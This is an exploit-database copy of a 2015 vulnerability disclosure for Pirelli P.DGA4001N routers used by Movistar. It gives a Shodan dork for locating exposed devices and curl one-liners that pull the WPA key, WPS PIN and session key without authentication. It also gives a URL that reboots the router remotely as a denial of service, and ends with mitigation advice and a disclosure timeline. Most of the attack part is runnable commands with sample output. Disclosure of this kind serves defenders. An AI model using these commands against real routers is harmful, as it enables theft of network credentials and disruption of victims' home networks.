Skip to content
cyberexploits
webapphardwaretext

Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure

Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure

Published on 2015-01-07

Source code

Pinned to commit 7eac4c3a2ce5
textplatforms/hardware/webapps/35721.txt7eac4c3a
raw
- Title:



CVE-2015-0554 ADB BroadBand Pirelli ADSL2/2+ Wireless Router P.DGA4001N  remote information disclosure 

HomeStation Movistar



- Author:



Eduardo Novella  @enovella_

ednolo[@]inf.upv[dot]es



- Version:



Tested on firmware version PDG_TEF_SP_4.06L.6





- Shodan dork : 

  + "Dropbear 0.46 country:es"  ( From now on it looks like not working on this way)





- Summary:



HomeStation movistar has deployed routers manufactured by Pirelli. These routers are vulnerable to fetch HTML code from any 

IP public over the world. Neither authentication nor any protection to avoid unauthorized extraction of sensitive information.





- The vulnerability and the way to exploit it:





$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "WLAN_"

                  <option value='0'>WLAN_DEAD</option>



$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var wpapskkey"

var wpaPskKey = 'IsAklFHhFFui1sr9ZMqD';



$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var WscDevPin"

var WscDevPin    = '12820078';



$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var sessionkey"

var sessionKey='1189641421';



$ curl -s http://${IP_ADDRESS}/wlcfg.html | grep -i "bssid:" -A 3

                     <td width="50">BSSID:</td>

                     <td>

                        DC:0B:1A:XX:XX:XX

                     </td>







# Rebooting the router remotely and provoking a Denial of Service

#-----------------------------------------------------------------

http://${IP_ADDRESS}/resetrouter.html



We can observe at the source:

<!-- hide



var sessionKey='846930886';

function btnReset() {

   var loc = 'rebootinfo.cgi?';



   loc += 'sessionKey=' + sessionKey;



   var code = 'location="' + loc + '"';

   eval(code);

}



// done hiding -->





http://${IP_ADDRESS}/rebootinfo.cgi?sessionKey=233665123





# All the information what we can fetch from.

#----------------------------------------------

webs$ ls

adslcfgadv.html       diagpppoe.html      ipv6lancfg.html    qoscls.html              statsatmreset.html

adslcfgc.html         dlnacfg.html        js                 qosqmgmt.html            statsifc.html

adslcfg.html          dnscfg.html         jsps               qosqueueadd.html         statsifcreset.html

adslcfgtone.html      dnsproxycfg.html    lancfg2.html       qsmain.html              statsmocalanreset.html

algcfg.html           dsladderr.html      languages          quicksetuperr.html       statsmocareset.html

APIS                  dslbondingcfg.html  lockerror.html     quicksetup.html          statsmocawanreset.html

atmdelerr.html        enblbridge.html     logconfig.html     quicksetuptesterr.html   statsvdsl.html

backupsettings.html   enblservice.html    logintro.html      quicksetuptestsucc.html  statsvdslreset.html

berrun.html           engdebug.html       logobkg.gif        rebootinfo.html          statswanreset.html

berstart.html         ethadderr.html      logoc.gif          resetrouter.html         statsxtmreset.html

berstop.html          ethdelerr.html      logo_corp.gif      restoreinfo.html         storageusraccadd.html

certadd.html          footer.html         logo.html          routeadd.html            stylemain.css

certcaimport.html     hlpadslsync.html    logomenu.gif       rtdefaultcfgerr.html     threeGPIN.html

certimport.html       hlpatmetoe.html     main.html          rtdefaultcfg.html        todadd.html

certloadsigned.html   hlpatmseg.html      menuBcm.js         scdmz.html               tr69cfg.html

cfgatm.html           hlpethconn.html     menu.html          scinflt.html             updatesettings.html

cfgeth.html           hlppngdns.html      menuTitle.js       scmacflt.html            upload.html

cfgl2tpac.html        hlppnggw.html       menuTree.js        scmacpolicy.html         uploadinfo.html

cfgmoca.html          hlppppoasess.html   mocacfg.html       scoutflt.html            upnpcfg.html

cfgptm.html           hlppppoeauth.html   multicast.html     scprttrg.html            url_add.html

colors.css            hlppppoeconn.html   natcfg2.html       scripts                  util.js

config.json.txt       hlppppoeip.html     ntwksum2.html      scvrtsrv.html            wanadderr.html

css                   hlptstdns.html      omcidownload.html  seclogintro.html         wancfg.html

ddnsadd.html          hlpusbconn.html     omcisystem.html    snmpconfig.html          wlcfgadv.html

defaultsettings.html  hlpwlconn.html      password.html      sntpcfg.html             wlcfg.html

dhcpinfo.html         html                portmapadd.html    standby.html             wlcfgkey.html

diag8021ag.html       ifcdns.html         portmapedit.html   StaticIpAdd.html         wlmacflt.html

diagbr.html           ifcgateway.html     portName.js        StaticIpErr.html         wlrefresh.html

diag.html             images              pppoe.html         statsadslerr.html        wlsecurity.html

diagipow.html         index.html          pradd.html         statsadsl.html           wlsetup.html

diaglan.html          info.html           ptmadderr.html     statsadslreset.html      wlwapias.html

diagmer.html          ipoacfg.html        ptmdelerr.html     statsatmerr.html         xdslcfg.html

diagpppoa.html        ippcfg.html         pwrmngt.html       statsatm.html







+ Conclusion:



  This vulnerability can be exploited remotely and it should be patched as soon as possible. An attacker could be monitoring our network

   or even worse being a member of a botnet without knowledge of it. 

  First mitigation could be  either try to update the last version for these routers or install 3rd parties firmwares as OpenWRT or DDWRT on them.

        





+ References:



http://packetstormsecurity.com/files/115663/Alpha-Networks-ADSL2-2-Wireless-Router-ASL-26555-Password-Disclosure.html







+ Timeline:



2013-04-xx Send email to Movistar and Pirelli

2015-01-05 Full disclosure 

View on GitHub